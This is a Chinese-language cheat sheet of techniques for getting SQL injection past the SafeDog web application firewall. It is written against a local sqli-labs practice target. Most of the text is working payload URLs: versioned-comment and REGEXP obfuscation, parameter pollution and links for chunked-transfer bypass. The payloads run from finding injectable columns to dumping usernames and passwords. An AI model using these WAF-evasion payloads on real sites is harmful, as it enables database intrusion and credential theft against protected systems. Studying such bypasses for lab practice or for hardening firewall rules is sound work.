2022.1.6最新版安全狗绕过语法
1.内联注释绕过
http://192.168.0.100/sqli-labs/Less-1/?id=1' -- qwe 单引号闭合,此处存在注入
尝试order by 4 被拦截 此处修改为group by 进行绕过,http://192.168.0.100/sqli-labs/Less-1/?id=1' group by 3 -- qwe
http://192.168.0.100/sqli-labs/Less-1/?id=1' REGEXP "[…%0a%23]" /*!11444union %0a select*/ 1,2,3 --+
最后判断3列
http://192.168.0.100/sqli-labs/Less-1/?id=1111111111'UnIoN//111/+/22//SELect+1,2,3+--+qwe
http://192.168.0.100/sqli-labs/Less-1/?id=1111111'+union//22/+/ddaaaaaaaaaaa/+select 1,2,3+--+qwe
回显点是2和3 在2处查看数据库信息,database//22/+/33//()
http://192.168.0.100/sqli-labs/Less-1/?id=-1' REGEXP "[…%0a%23]" UnIoN//111/+/22//SELect 1,database//11/+/22//(),3 --+
http://192.168.0.100/sqli-labs/Less-1/?id=-1' REGEXP "[…%0A%23]"%20 /!11444union %0A select/ 1,database///- -///(),3 --+
http://192.168.0.100/sqli-labs/Less-1/?id=1111111'+union//22/+/ddaaaaaaaaaaa/+select 1,2,%0a group_concat(schema_name) from %0a /!11444 /REGEXP "[…%0a%23]"/ %0a information_schema.schemata/-- +
查看所有数据库信息
http://192.168.0.100/sqli-labs/Less-1/?id=1111111'+union//22/+/ddaaaaaaaaaaa/+select 1,2,%0a group_concat(table_name) from %0a /!11444 /REGEXP "[…1%0a%23]"/ %0a information_schema.tables/-- +
查询所有表名
指定security库中查询所有的列名
http://192.168.0.100/sqli-labs/Less-1/?id=1111111'+union//22/+/ddaaaaaaaaaaa/+select 1,2,%0a group_concat(table_name) from %0a /!11444 /REGEXP "[…1%0a%23]"/ %0a information_schema.tables/where+table_schema='security'-- +
http://192.168.0.100/sqli-labs/Less-1/?id=1111111' REGEXP "[…%0a%23]" union//22/+/33//select//22/+/33//
1,2,group_concat(column_name) from /!--+/%0ainformation_schema.columns*/
where table_name='users' --+ 出users里面所有的字段名
http://192.168.0.100/sqli-labs/Less-1/?id=-1' union//22/+/33//select//22/+/33//1,2,group_concat(id,username,password) from users -- qwe 查询字段内数据
2.参数污染绕过
参考链接:https://blog.csdn.net/weixin_39190897/article/details/113081278
http://192.168.0.104/sqli-labs/Less-1/?id=1 /&id=-1' union select 1,2,database()+--+qwe/
获取数据库名
http://192.168.0.104/sqli-labs/Less-1/?id=1 /&id=-1' union select 1,2,group_concat(table_name) from
information_schema.tables where table_schema='security' -- qwe/ 获取security所有表名
http://192.168.0.104/sqli-labs/Less-1/?id=1 /&id=-1' union select 1,2,group_concat(column_name) from
information_schema.columns where table_name='users' -- qwe/ 获取字段名
http://192.168.0.104/sqli-labs/Less-1/?id=1 /&id=-1' union select 1,2,group_concat(id,username,password) from users -- qwe/ 获取内容
分块传输绕过
https://www.cnblogs.com/renhaoblog/p/13395539.html
https://www.cnblogs.com/backlion/p/10569976.html
https://www.freebuf.com/articles/web/259377.html
在通过http传输文件的时候,通常会有一个 Content-Length 用来指定文件的长度,比如传输图片,静 态页面,客户端也以 Content-Length 作为接收内容结束的标志,接收完毕后就可以断开连接了。但是 有时候发送方并不能确定内容的长度,造成的影响就是:接收方无法通过 Content-Length 得到报文体 的长度,也就无法得知什么时候应该中断连接。
安装链接 https://github.com/c0ny1/chunked-coding-converter/releases